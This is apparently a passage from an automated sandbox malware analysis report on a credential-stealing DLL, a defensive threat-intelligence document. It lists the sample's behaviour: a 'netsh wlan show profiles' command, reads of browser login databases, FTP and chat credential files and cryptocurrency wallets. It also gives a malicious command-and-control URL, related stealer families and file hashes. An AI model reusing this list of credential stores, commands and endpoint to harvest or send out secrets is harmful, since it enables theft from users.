    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
    Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.docx VolumeInformation
    Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Users\user\Desktop\NWTVCDUMOB.docx VolumeInformation
    Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation

    Lowering of HIPS / PFW / Operating System Security Settings

    Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles

    Stealing of Sensitive Information

    Source: Yara match File source: 0j6nSbUQQS.dll, type: SAMPLE
    Source: rundll32.exe, 0000000E.00000002.2006335358.0000000002AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets
    Source: rundll32.exe, 00000004.00000002.1933821234.0000000003427000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\y`
    Source: powershell.exe, 0000000A.00000002.1854168483.00000272DFE72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
    Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\oobe\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Program Files (x86)\SAKdUOMwdLWNDHuLiohnbyuKfJxGjOCUiRGuEjjNLzmpYeUJQBmol\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 111 Process Injection | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 Security Software Discovery | Remote Services | 3 Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Other Network Medium | Abuse Accessibility Features
    Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | 1 Credentials in Registry | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | 1 Credentials In Files | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Rundll32 | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
    [Behavior graph (image not reproduced): Behavior Graph ID: 1543325, Sample: 0j6nSbUQQS.dll, Startdate: 27/10/2024, Architecture: WINDOWS, Score: 100]

    Source | Detection | Scanner | Label | Link
    0j6nSbUQQS.dll | 55% | ReversingLabs | Win32.Trojan.BotX |
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
    https://aka.ms/winsvr-2022-pshelp | 0% | URL Reputation | safe |
    http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
    http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
    https://contoso.com/License | 0% | URL Reputation | safe |
    https://contoso.com/Icon | 0% | URL Reputation | safe |
    https://aka.ms/winsvr-2022-pshelpX | 0% | URL Reputation | safe |
    http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
    https://contoso.com/ | 0% | URL Reputation | safe |
    https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
    https://aka.ms/pscore68 | 0% | URL Reputation | safe |
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
    No contacted domains info
    Name | Malicious | Antivirus Detection | Reputation
    http://185.215.113.217/CoreOPT/index.php | true | | unknown
    http://185.215.113.217/CoreOPT/index.php?wal=1 | true | | unknown
                              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                              185.215.113.217 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1543325
                              Start date and time:2024-10-27 17:46:06 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 2s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:23
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:0j6nSbUQQS.dll
                              renamed because original name is a hash value
                              Original Sample Name:921b0badeaffee860310e6755769337e.dll
                              Detection:MAL
                              Classification:mal100.phis.troj.spyw.evad.winDLL@32/18@0/1
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 4
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Found application associated with file extension: .dll
                              • Stop behavior analysis, all processes terminated
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target powershell.exe, PID 1184 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtEnumerateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: 0j6nSbUQQS.dll
                              Time | Type | Description
                              12:47:06 | API Interceptor | 58x Sleep call for process: powershell.exe modified
                              12:47:09 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
                              Match | Associated Sample Name / URL | Detection | Threat Name | Context
                              185.215.113.217 | uLV6jN2BWh.dll | malicious | Unknown | 185.215.113.217/CoreOPT/index.php
                              185.215.113.217 | uLV6jN2BWh.dll | malicious | Unknown | 185.215.113.217/CoreOPT/index.php
                              185.215.113.217 | mU3Ob2XcCt.dll | malicious | Amadey | 185.215.113.217/CoreOPT/index.php?wal=1
                              No context
                              Match | Associated Sample Name / URL | Detection | Threat Name | Context
                              WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
                              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
                              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
                              WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
                              WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.16
                              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
                              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
                              WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
                              WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
                              WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
                              No context
                              No context
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):0.34726597513537405
                              Encrypted:false
                              SSDEEP:3:Nlll:Nll
                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                              Malicious:false
                              Preview:@...e...........................................................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):3081
                              Entropy (8bit):7.745023518842827
                              Encrypted:false
                              SSDEEP:96:ykZSYsntzLyyyXNgAldbqJyyyXNgAld0qSa/SFxZ3lJDOf:9ZS3lidl4Jlidl8Wf
                              MD5:5EEE6058EC87911A821ACEE148388137
                              SHA1:3B36F1D3E9EC1C7B64ECF7079A9A9429327CE6C1
                              SHA-256:65596E741416EFA56DB22F1F127A3AF164703C6B95B4A8F1EFC5FE2CF5C14321
                              SHA-512:CFF6C4AC00C0C230E1206D5BA32647D3F9F1B7B47F795D8EEBE9E95C87552B2B159457860AF27EF880BA888B8B7717C43F62E2C9BFAE7FC1616F1A7D7D249371
                              Malicious:true
                              Process:C:\Windows\SysWOW64\rundll32.exe
                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                              Category:dropped
                              Size (bytes):1026
                              Entropy (8bit):4.687722658485212
                              Encrypted:false
                              SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                              MD5:9A59DF7A478E34FB1DD60514E5C85366
                              SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                              SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                              SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                              Malicious:false
                              Process:C:\Windows\SysWOW64\rundll32.exe
                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                              Category:dropped
                              Size (bytes):1026
                              Entropy (8bit):4.696250160603532
                              Encrypted:false
                              SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                              MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                              SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                              SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                              SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                              Malicious:false
                              Process:C:\Windows\SysWOW64\rundll32.exe
                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                              Category:dropped
                              Size (bytes):1026
                              Entropy (8bit):4.700014595314478
                              Encrypted:false
                              SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                              MD5:960373CA97DEDBA8576ECF40D0D1E39D
                              SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                              SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                              SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                              Malicious:false
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
